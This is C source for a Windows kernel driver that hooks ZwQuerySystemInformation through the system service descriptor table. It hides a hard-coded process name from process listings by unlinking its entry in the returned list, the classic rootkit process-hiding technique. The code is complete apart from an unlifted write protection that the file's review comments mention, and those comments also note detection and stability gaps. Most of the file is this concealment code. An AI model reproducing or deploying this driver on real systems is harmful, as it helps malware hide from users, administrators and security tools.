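/* ******************************************************************
 * Name:    WinHook.c
 *
 * Hooks one system service (ZwQuerySystemInformation) on Windows 2000 or
 * later, x86 only, and hides a single process name from the list returned
 * by the SystemProcessInformation class.
 *
 * Security note (review): this is the classic SSDT-hook process-hiding
 * technique. The hook patches KeServiceDescriptorTable in place, so any
 * tool that compares the SSDT slots against the addresses inside ntoskrnl
 * sees it, and the hidden process is only removed from this one view --
 * other enumeration paths are untouched. On later x86 releases the SSDT
 * page is typically write-protected, and nothing here lifts that
 * protection (CR0.WP / MDL) before the store in HookSystemCall(); confirm
 * on the target OS before loading.
 *
 * Copyright (C) ndis 2004, All rights reserved.
 * ****************************************************************** */
/* The first include target was lost in extraction; the Io, Ke and Rtl
 * kernel APIs used below come from the WDK kernel header. */
#include <ntddk.h>
#include "WinHook.h"

/* ******************************************************************
 * Macro for easy hook/unhook. On x86 every Zw* stub begins with
 * "mov eax, <service number>", so the DWORD that follows the first opcode
 * byte is the system call number. Reading it out of the Zw function passed
 * as a parameter gives the SSDT index without hard-coding it, which keeps
 * the hook dependent only on that stub layout.
 *
 * NOTE(review): the index is not range-checked against the table size and
 * the read silently returns garbage if the stub layout ever changes; verify
 * both on the target build.
 * ****************************************************************** */
#define SYSCALL(_function) \
    ServiceTable->ServiceTable[*(PULONG)((PUCHAR)(_function) + 1)]

/* SystemInformationClass value whose result is the process/thread list. */
#define SYSTEM_PROCESS_INFORMATION_CLASS 5

/* Image name that is removed from SystemProcessInformation results. */
#define HIDDEN_PROCESS_NAME L"winlogon.exe"

/* Bytes of a process entry this driver actually reads: everything up to
 * and including ProcessName. Used to make sure an entry header lies inside
 * the caller's buffer before it is touched. */
#define PROCESS_ENTRY_HEADER_SIZE \
    (FIELD_OFFSET(struct _SYSTEM_PROCESSES, ProcessName) + sizeof(UNICODE_STRING))

/* Pointer to the system global service table (KeServiceDescriptorTable). */
PSRVTABLE ServiceTable;

#pragma code_seg("ENTRY")
/* Driver entry point.
 *
 * Creates the control device and its DosDevices link, registers the
 * dispatch and unload routines, then installs the system call hook.
 * Returns STATUS_SUCCESS, or the NTSTATUS of the Io* call that failed; on
 * failure everything created so far is torn down again. */
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
    NTSTATUS nRet;
    /* Start as NULL so a failed IoCreateDevice can never leave a stale
     * pointer that is later handed to IoDeleteDevice. */
    PDEVICE_OBJECT lpHookDeviceObject = NULL;
    UNICODE_STRING uszDeviceName, uszDriverName;

    RtlInitUnicodeString(&uszDeviceName, L"\\Device\\WinHook");
    RtlInitUnicodeString(&uszDriverName, L"\\DosDevices\\WinHook");

    nRet = IoCreateDevice(DriverObject,
                          0,
                          &uszDeviceName,
                          FILE_DEVICE_WINHOOK,
                          0,
                          TRUE,
                          &lpHookDeviceObject);
    if (!NT_SUCCESS(nRet)) {
        DbgPrint("******WinHook:Failed to create device!******\n");
        return nRet;
    }

    /* Symbolic link so a user-mode GUI can open the device. Any local user
     * can open it; DriverDispatch completes every request without doing
     * any work, so nothing is reachable through it. */
    nRet = IoCreateSymbolicLink(&uszDriverName, &uszDeviceName);
    if (!NT_SUCCESS(nRet)) {
        DbgPrint("******WinHook:Failed to create device!******\n");
        IoDeleteDevice(lpHookDeviceObject);
        return nRet;
    }

    /* One dispatch routine for every major function this device handles. */
    DriverObject->MajorFunction[IRP_MJ_CREATE] = DriverDispatch;
    DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] = DriverDispatch;
    DriverObject->MajorFunction[IRP_MJ_CLOSE] = DriverDispatch;
    DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DriverDispatch;
    DriverObject->DriverUnload = DriverUnload;

    /* The service table is an ntoskrnl export (declared in WinHook.h). */
    ServiceTable = KeServiceDescriptorTable;
    DbgPrint("WinHook:SystemCallService: %p\n", ServiceTable);

    HookSystemCall();
    DbgPrint("******WinHook:Hook System Call Service******\n");
    return STATUS_SUCCESS;
}
#pragma code_seg()

#pragma code_seg("SETHOOK")
/* Installs the hook: saves the SSDT slot for ZwQuerySystemInformation in
 * RealZwQuerySystemInformation and points the slot at the hook.
 *
 * NOTE(review): a plain store -- nothing lifts the page's write protection
 * first, and the slot is not checked to still hold the kernel's own handler
 * (another hook may already be installed and would be chained blindly). */
VOID HookSystemCall(void)
{
    RealZwQuerySystemInformation = SYSCALL(ZwQuerySystemInformation);
    SYSCALL(ZwQuerySystemInformation) = (PVOID)HookZwQuerySystemInformation;
}
#pragma code_seg()

#pragma code_seg("UNHOOK")
/* Restores the saved SSDT slot. Only writes back a handler that was
 * actually saved, so the slot can never be overwritten with NULL. */
VOID UnhookSystemCall(void)
{
    if (RealZwQuerySystemInformation != NULL) {
        SYSCALL(ZwQuerySystemInformation) = (PVOID)RealZwQuerySystemInformation;
    }
}
#pragma code_seg()

#pragma code_seg("HOOK")
/* Returns the entry that follows 'entry' inside [base, base + length), or
 * NULL when 'entry' is the last one (zero delta) or when the delta would
 * leave the buffer or land where a header no longer fits. NextEntryDelta
 * lives in memory the caller owns and can rewrite, so it is never followed
 * unchecked. 'entry' must already be inside the buffer with at least
 * PROCESS_ENTRY_HEADER_SIZE bytes remaining. */
static struct _SYSTEM_PROCESSES *
NextProcessEntry(struct _SYSTEM_PROCESSES *entry, PUCHAR base, ULONG length)
{
    ULONG_PTR remaining = (ULONG_PTR)((base + length) - (PUCHAR)entry);

    if (entry->NextEntryDelta == 0) {
        return NULL;
    }
    /* The next header must fit completely: delta + header <= remaining. */
    if (remaining < PROCESS_ENTRY_HEADER_SIZE ||
        (ULONG_PTR)entry->NextEntryDelta > remaining - PROCESS_ENTRY_HEADER_SIZE) {
        return NULL;
    }
    return (struct _SYSTEM_PROCESSES *)((PUCHAR)entry + entry->NextEntryDelta);
}

/* TRUE when the counted string's characters lie completely inside the
 * caller's buffer, so comparing against it cannot read outside it. */
static BOOLEAN
NameInsideBuffer(const UNICODE_STRING *name, PUCHAR base, ULONG length)
{
    PUCHAR chars = (PUCHAR)name->Buffer;

    if (chars < base || chars > base + length) {
        return FALSE;
    }
    return (ULONG_PTR)name->Length <= (ULONG_PTR)((base + length) - chars);
}

/* Hook for ZwQuerySystemInformation.
 *
 * Calls the real service and, for a successful SystemProcessInformation
 * query, unlinks every entry whose image name equals HIDDEN_PROCESS_NAME
 * (case-insensitive) from the list in the caller's buffer. The list is a
 * chain of NextEntryDelta byte offsets terminated by 0; an entry is hidden
 * by making its predecessor's delta jump over it. The first entry is never
 * examined (unchanged from the original) and serves as the initial
 * predecessor, which is what lets the second entry be unlinked too.
 *
 * ReturnLength is left as the real service reported it: the hidden bytes
 * stay in the buffer, they are just no longer reachable through the chain.
 *
 * NOTE(review): SystemInformation may be a user-mode buffer. Every delta,
 * name pointer and length read from it is bounds-checked before use, but
 * the pages can still be unmapped by another thread between the real call
 * and this walk; that needs a probe/SEH guard, which this code lacks. */
NTSTATUS HookZwQuerySystemInformation(
    IN ULONG SystemInformationClass,
    IN PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength)
{
    NTSTATUS nRet;
    UNICODE_STRING uszProcName;
    PUCHAR base = (PUCHAR)SystemInformation;
    struct _SYSTEM_PROCESSES *lpPrev;
    struct _SYSTEM_PROCESSES *lpCurr;

    nRet = (RealZwQuerySystemInformation)(SystemInformationClass,
                                          SystemInformation,
                                          SystemInformationLength,
                                          ReturnLength);

    if (!NT_SUCCESS(nRet) ||
        SystemInformationClass != SYSTEM_PROCESS_INFORMATION_CLASS ||
        base == NULL ||
        SystemInformationLength < PROCESS_ENTRY_HEADER_SIZE) {
        return nRet;
    }

    RtlInitUnicodeString(&uszProcName, HIDDEN_PROCESS_NAME);

    lpPrev = (struct _SYSTEM_PROCESSES *)base;
    lpCurr = NextProcessEntry(lpPrev, base, SystemInformationLength);

    while (lpCurr != NULL) {
        struct _SYSTEM_PROCESSES *lpNext =
            NextProcessEntry(lpCurr, base, SystemInformationLength);

        if (NameInsideBuffer(&lpCurr->ProcessName, base, SystemInformationLength) &&
            RtlCompareUnicodeString(&uszProcName, &lpCurr->ProcessName, TRUE) == 0) {
            /* Hide lpCurr: lpPrev now jumps straight to lpNext. When lpCurr
             * was the last entry (or its delta was invalid) lpPrev becomes
             * the last. lpPrev is deliberately kept, so lpNext is still
             * compared on the next pass and adjacent matches are all hidden. */
            lpPrev->NextEntryDelta =
                (lpNext != NULL) ? lpPrev->NextEntryDelta + lpCurr->NextEntryDelta : 0;
        } else {
            lpPrev = lpCurr;
        }
        lpCurr = lpNext;
    }
    return nRet;
}
#pragma code_seg()

#pragma code_seg("PATCH")
/* Dispatch routine for the control device.
 *
 * Completes every IRP with STATUS_SUCCESS and zero bytes of output. There
 * is no IOCTL interface: the device exists only so a user-mode client can
 * open it, and the process name to hide is compiled in. */
NTSTATUS DriverDispatch(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
    PIO_STACK_LOCATION lpIrpStack = IoGetCurrentIrpStackLocation(Irp);

    switch (lpIrpStack->MajorFunction) {
    case IRP_MJ_CREATE:
    case IRP_MJ_SHUTDOWN:
    case IRP_MJ_CLOSE:
    case IRP_MJ_DEVICE_CONTROL:
        DbgPrint("WinHook Dispatch\n");
        break;
    default:
        /* Not registered in DriverEntry; completed successfully anyway. */
        break;
    }

    Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}
#pragma code_seg()

#pragma code_seg("UNLOAD")
/* Unload routine: restores the SSDT slot, removes the DosDevices link and
 * deletes the device object.
 *
 * NOTE(review): nothing waits for threads still executing
 * HookZwQuerySystemInformation; unloading while one is inside the hook
 * unmaps code that is still running. */
VOID DriverUnload(IN PDRIVER_OBJECT DriverObject)
{
    UNICODE_STRING uszDriverName;

    DbgPrint("******WinHook Driver Unloading******\n");

    UnhookSystemCall();

    RtlInitUnicodeString(&uszDriverName, L"\\DosDevices\\WinHook");
    IoDeleteSymbolicLink(&uszDriverName);

    IoDeleteDevice(DriverObject->DeviceObject);
    DbgPrint("******Deleted devices******\n");
}
#pragma code_seg()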